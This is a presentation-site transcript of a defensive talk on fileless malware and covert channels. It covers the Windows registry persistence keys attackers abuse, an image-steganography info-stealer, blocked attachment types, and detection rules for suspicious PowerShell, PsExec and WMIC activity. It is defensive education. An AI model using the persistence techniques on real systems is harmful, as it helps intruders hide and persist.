1 / 27

Increasing Covert Channels and Fileless Attacks: A Rising Threat to All Industries

Covert channels and fileless attacks are becoming more prevalent across industries, utilizing hidden communication and evading traditional security measures. Learn about the methods, effectiveness, and prevention of these sophisticated attacks.

Download Presentation

Increasing Covert Channels and Fileless Attacks: A Rising Threat to All Industries

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. "Hiding in Plain Sight: Fileless Attacks and Covert Communication Channels are Increasing Across all Industries."

  2. Terms Covert Channels Capability to transfer information between two hosts, which are not explicitly allowed to communicate FilelessMaware Attack technique that avoids downloading malicious, executable files, usually to disk, at one stage or another by using exploits, macros, scripts, or legitimate system tools instead. Steganography Concealing messages or information within other non-

  3. Fileless Malware • Most of these types of attacks are actually “semi-fileless • Once compromised, these attacks also abuse legitimate systems and admin tools and processes to gain persistence, elevate privileges, and spread laterally across the network.“ • Evade protection by traditional file-based or signature-based tools. So any technique designed to try to circumvent or evade detection by those tools really falls into the fileless attack category.

  4. Why is this Method Effective? • Doesn’t trigger Anti-virus (file/signature-based) • Non-persistent (runs in memory) • “Lives off the Land” • PowerShell • WMI • VBSCripts • Linux: Python, PERL, Bash scripts

  5. How they do it

  6. Covert Communication Channels • Receive commands • Send execution feedback (go/no-go) • Receive updates • Evade security defenses (IDS, AV, IR, Forensic Analysis) • Exfiltrate data

  7. Covert Channels

  8. Sophistication

  9. Persistence Modifying Registry Keys • Run/RunOnce Keys • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce • BootExecute Key • AppInit_DLLs: DLLs loaded by User32.dll (commonly used by other programs) • BootExecute: Programs launched by smss.exe at system startup • Browser Helper Objects: DLLs run by Internet Explorer when it starts • File Association: Program(s) to be run when a file of a certain type is opened • Notify: Programs to be run when user types Ctrl-Alt-Del • Run/RunOnce: Programs run when a user logs in • Services: Windows services executed at startup • Shell: Should point to explorer.exe, tells Windows the save location of the command line • Startup: Windows services executed at startup

  10. Persistence • Run/RunOnce Keys • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce • BootExecute Key • Since smss.exe launches before windows subsystem loads, it calls configuration subsystem to load the hive present at • HKLM\SYSTEM\CurrentControlSet\Control\hivelist. • Also smss.exe will launch anything present in the BootExecute key at HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager.

  11. Steganography • Hidden malicious code/payload inside of images • Least Significant Bit Method (LSB)

  12. Simple .jpeg image right?

  13. Not quite • Information stealer • Downloader module • Detects analysis environment • Downloads image from legitimate websites • Extracts main module code from image • Launches main module code • Creates verbose profile of infected hosts • Downloads additional modules, depending on host profiles

  14. Prevention Detection Correction

  15. Prevention User training • Formal, user friendly, updated at least annually • Initial & Annual requirement • Testing (phishing) Prevention Technologies ($$$) • Secure Email Gateway • Secure Web Gateway • Nextgen endpoint protection (advanced threat prevention, heuristics) • MFA/2FA for remote access and down to some endpoints Technical Policy Controls (“Free”) • Block risky email attachments (.exe, .bat, .doc, .dll, .js, .vbs, .ps1, .cmd, .msi, .inf, .sh) • Browser extensions - whitelist (group policy) • Remove local admin privileges • Secure usae of EA/DA accounts • Patching

  16. Detection • Alert rules for anomalous behavior: • Processes executing shell commands • Suspicious commands executed by listening processes. • Excessive network communications from processes that are somewhat abnormal/anomalous • SSL Decryption at the edge • Limited persistence and privilege escalation • Sandbox file detonation

  17. Detection cont’d. • PowerShell event 4014 (Script Block Logging) contains a ton of data • Event 4688: PowerShell via PsExec • PowerShell via WMIC or PsExec • Suspicious service creation • User creation and users added to Local/Global Admin group

  18. Correction Incident Response Plan • Playbook • Tested – practice “cyber fire drills” • Updated System Recovery/Backups • VSS • VM Snapshots • Onsite & off-site Third-Party Response Retainer

  19. Impacts/Consequences • Temporary or permanent loss of sensitive or proprietary information • Disruption to business operations • Financial losses: restore systems and files, fines, lawsuits • Potential harm to an organization’s reputation

  20. Resources • MITRE ATT&CK • NSA’s Spotting the Adversary with Windows Event Log Monitoring • Internet Storm Center Daily Podcast • US-CERT Alerts & Advisories • Microsoft Security Response Center (MSRC)

  21. Questions?

More Related